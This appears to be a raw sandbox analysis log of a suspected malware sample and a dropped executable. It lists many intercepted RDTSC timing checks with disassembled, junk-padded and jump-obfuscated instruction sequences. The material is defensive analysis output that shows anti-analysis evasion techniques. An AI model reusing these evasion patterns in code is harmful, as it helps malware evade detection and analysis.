Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D075E second address: 55D0777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 lea ebx, dword ptr [edi+01h] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB1C8D0EF6Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D0777 second address: 55D07E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8B21D3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov al, byte ptr [edi+01h] 0x0000000c jmp 00007FB1C8B21D46h 0x00000011 inc edi 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FB1C8B21D3Eh 0x00000019 add si, CF28h 0x0000001e jmp 00007FB1C8B21D3Bh 0x00000023 popfd 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007FB1C8B21D46h 0x0000002c and al, FFFFFF88h 0x0000002f jmp 00007FB1C8B21D3Bh 0x00000034 popfd 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D07E9 second address: 55D07ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D07ED second address: 55D0814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test al, al 0x00000009 pushad 0x0000000a mov ah, 3Ah 0x0000000c mov ebx, 78385382h 0x00000011 popad 0x00000012 jne 00007FB239779FB6h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB1C8B21D3Bh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D0814 second address: 55D081A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D081A second address: 55D086F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8B21D44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FB1C8B21D3Eh 0x00000012 and al, 00000078h 0x00000015 jmp 00007FB1C8B21D3Bh 0x0000001a popfd 0x0000001b pushad 0x0000001c movsx edx, si 0x0000001f popad 0x00000020 popad 0x00000021 shr ecx, 02h 0x00000024 jmp 00007FB1C8B21D3Ch 0x00000029 rep movsd 0x0000002b rep movsd 0x0000002d rep movsd 0x0000002f rep movsd 0x00000031 rep movsd 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D086F second address: 55D0927 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov di, ax 0x00000009 popad 0x0000000a mov ecx, edx 0x0000000c pushad 0x0000000d jmp 00007FB1C8D0EF6Eh 0x00000012 pushfd 0x00000013 jmp 00007FB1C8D0EF72h 0x00000018 sub ah, 00000068h 0x0000001b jmp 00007FB1C8D0EF6Bh 0x00000020 popfd 0x00000021 popad 0x00000022 and ecx, 03h 0x00000025 jmp 00007FB1C8D0EF76h 0x0000002a rep movsb 0x0000002c pushad 0x0000002d mov bh, ch 0x0000002f mov dx, 695Eh 0x00000033 popad 0x00000034 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000003b jmp 00007FB1C8D0EF75h 0x00000040 mov eax, ebx 0x00000042 jmp 00007FB1C8D0EF6Eh 0x00000047 mov ecx, dword ptr [ebp-10h] 0x0000004a pushad 0x0000004b mov eax, 5635FCEDh 0x00000050 mov ch, 7Ah 0x00000052 popad 0x00000053 mov dword ptr fs:[00000000h], ecx 0x0000005a pushad 0x0000005b mov cx, bx 0x0000005e mov ebx, 4B5B8CD2h 0x00000063 popad 0x00000064 pop ecx 0x00000065 pushad 0x00000066 mov edx, 22DFE42Ah 0x0000006b popad 0x0000006c pop edi 0x0000006d push eax 0x0000006e push edx 0x0000006f pushad 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D0927 second address: 55D092E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D092E second address: 55D0934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D0934 second address: 55D0938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D0938 second address: 55D098B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8D0EF73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d mov eax, 786927EBh 0x00000012 push ecx 0x00000013 call 00007FB1C8D0EF77h 0x00000018 pop eax 0x00000019 pop edi 0x0000001a popad 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jmp 00007FB1C8D0EF71h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D098B second address: 55D099D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB1C8B21D3Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D099D second address: 55D09AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 leave 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D09AB second address: 55D09C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8B21D45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D09C4 second address: 55D051F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b retn 0008h 0x0000000e cmp dword ptr [ebp-2Ch], 10h 0x00000012 mov eax, dword ptr [ebp-40h] 0x00000015 jnc 00007FB1C8D0EF65h 0x00000017 push eax 0x00000018 lea edx, dword ptr [ebp-00000590h] 0x0000001e push edx 0x0000001f call esi 0x00000021 push 00000008h 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov edx, 5A13CE86h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D0AB8 second address: 55D0ADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8B21D41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB1C8B21D3Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D0ADC second address: 55D0B4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB1C8D0EF71h 0x00000009 xor eax, 08867C26h 0x0000000f jmp 00007FB1C8D0EF71h 0x00000014 popfd 0x00000015 mov cx, 7157h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e jmp 00007FB1C8D0EF78h 0x00000023 mov bl, ch 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b call 00007FB1C8D0EF76h 0x00000030 pop esi 0x00000031 mov eax, edi 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D0B4C second address: 55D0B63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB1C8B21D43h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D0B63 second address: 55D0B67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 7FB372 second address: 7FB378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 7FB378 second address: 7FB392 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB1C8D0EF66h 0x00000008 jg 00007FB1C8D0EF66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007FB1C8D0EF90h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 7FB392 second address: 7FB398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 7FB4D7 second address: 7FB4DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 7FB4DD second address: 7FB515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FB1C8B21D3Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB1C8B21D48h 0x00000013 jmp 00007FB1C8B21D3Ah 0x00000018 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 7FB685 second address: 7FB689 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 7FB7E0 second address: 7FB7E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 7FB9F0 second address: 7FB9FA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB1C8D0EF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 7FE97B second address: 68ED4D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB1C8B21D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b xor dword ptr [esp], 692A153Ah 0x00000012 mov edx, dword ptr [ebp+122D3ACAh] 0x00000018 mov dword ptr [ebp+122D1D2Bh], eax 0x0000001e push dword ptr [ebp+122D02D9h] 0x00000024 mov cl, ah 0x00000026 push eax 0x00000027 pushad 0x00000028 jmp 00007FB1C8B21D40h 0x0000002d mov di, 0500h 0x00000031 popad 0x00000032 pop ecx 0x00000033 call dword ptr [ebp+122D2CC3h] 0x00000039 pushad 0x0000003a add dword ptr [ebp+122D3197h], edx 0x00000040 mov dword ptr [ebp+122D3197h], eax 0x00000046 xor eax, eax 0x00000048 jmp 00007FB1C8B21D40h 0x0000004d mov edx, dword ptr [esp+28h] 0x00000051 js 00007FB1C8B21D3Dh 0x00000057 jc 00007FB1C8B21D37h 0x0000005d stc 0x0000005e mov dword ptr [ebp+122D3BA6h], eax 0x00000064 mov dword ptr [ebp+122D1D4Fh], ecx 0x0000006a mov esi, 0000003Ch 0x0000006f or dword ptr [ebp+122D1D4Fh], ebx 0x00000075 add esi, dword ptr [esp+24h] 0x00000079 add dword ptr [ebp+122D1D4Fh], esi 0x0000007f jnp 00007FB1C8B21D3Ch 0x00000085 lodsw 0x00000087 cld 0x00000088 add eax, dword ptr [esp+24h] 0x0000008c jmp 00007FB1C8B21D43h 0x00000091 mov ebx, dword ptr [esp+24h] 0x00000095 sub dword ptr [ebp+122D3197h], ebx 0x0000009b push eax 0x0000009c je 00007FB1C8B21D40h 0x000000a2 push eax 0x000000a3 push edx 0x000000a4 pushad 0x000000a5 popad 0x000000a6 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 7FEA78 second address: 7FEA7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 7FEB08 second address: 7FEB25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB1C8B21D40h 0x00000012 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 7FEBFE second address: 7FEC0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 7FEC0B second address: 7FEC0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 7FEC0F second address: 7FEC15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 80F90E second address: 80F926 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB1C8B21D44h 0x00000009 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 81F077 second address: 81F084 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB1C8D0EF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 81F084 second address: 81F093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FB1C8B21D36h 0x0000000f rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 81F093 second address: 81F0A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FB1C8D0EF66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 81F0A4 second address: 81F0D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB1C8B21D36h 0x0000000a jc 00007FB1C8B21D36h 0x00000010 popad 0x00000011 ja 00007FB1C8B21D3Ch 0x00000017 push edx 0x00000018 jmp 00007FB1C8B21D3Fh 0x0000001d pop edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 81F0D5 second address: 81F0DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 81D649 second address: 81D66B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB1C8B21D49h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 81DDB8 second address: 81DDBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 81DDBE second address: 81DDC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 81E05E second address: 81E062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 81E062 second address: 81E066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 7EB95C second address: 7EB96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FB1C8D0EF6Ah 0x0000000c rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 7EB96D second address: 7EB972 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 7EB972 second address: 7EB978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 81E9CE second address: 81E9D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 81EB11 second address: 81EB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jne 00007FB1C8D0EF66h 0x0000000c popad 0x0000000d js 00007FB1C8D0EF78h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 825A4E second address: 825A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 82487F second address: 824897 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB1C8D0EF6Dh 0x00000010 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 82910F second address: 829128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007FB1C8B21D67h 0x00000010 pushad 0x00000011 je 00007FB1C8B21D36h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 8293E6 second address: 8293EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 8293EA second address: 8293EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 8293EE second address: 82941B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007FB1C8D0EF76h 0x0000000e pushad 0x0000000f jg 00007FB1C8D0EF66h 0x00000015 jg 00007FB1C8D0EF66h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 82BDA6 second address: 82BDB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1C8B21D3Dh 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 7F43E1 second address: 7F43E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 7F43E7 second address: 7F43FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1C8B21D3Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 82DB93 second address: 82DB97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 82DB97 second address: 82DB9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 82DE64 second address: 82DE80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB1C8D0EF78h 0x00000009 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 82E117 second address: 82E11D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 82E11D second address: 82E127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FB1C8D0EF66h 0x0000000a rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 82E2AE second address: 82E2B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 82E771 second address: 82E776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 82E776 second address: 82E780 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FB1C8B21D36h 0x0000000a rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 82E780 second address: 82E784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 82E784 second address: 82E791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 82EA2A second address: 82EA48 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FB1C8D0EF71h 0x0000000c jmp 00007FB1C8D0EF6Bh 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 82ECD0 second address: 82ECD6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 82ECD6 second address: 82ECDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 82EDD3 second address: 82EDDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 82EDDD second address: 82EE00 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007FB1C8D0EF6Ch 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 ja 00007FB1C8D0EF66h 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 82F30A second address: 82F334 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8B21D3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB1C8B21D3Fh 0x00000016 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 830EAA second address: 830EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 830527 second address: 83054E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007FB1C8B21D36h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e ja 00007FB1C8B21D3Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB1C8B21D3Bh 0x0000001b rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 83196C second address: 831974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 832FC1 second address: 832FC7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
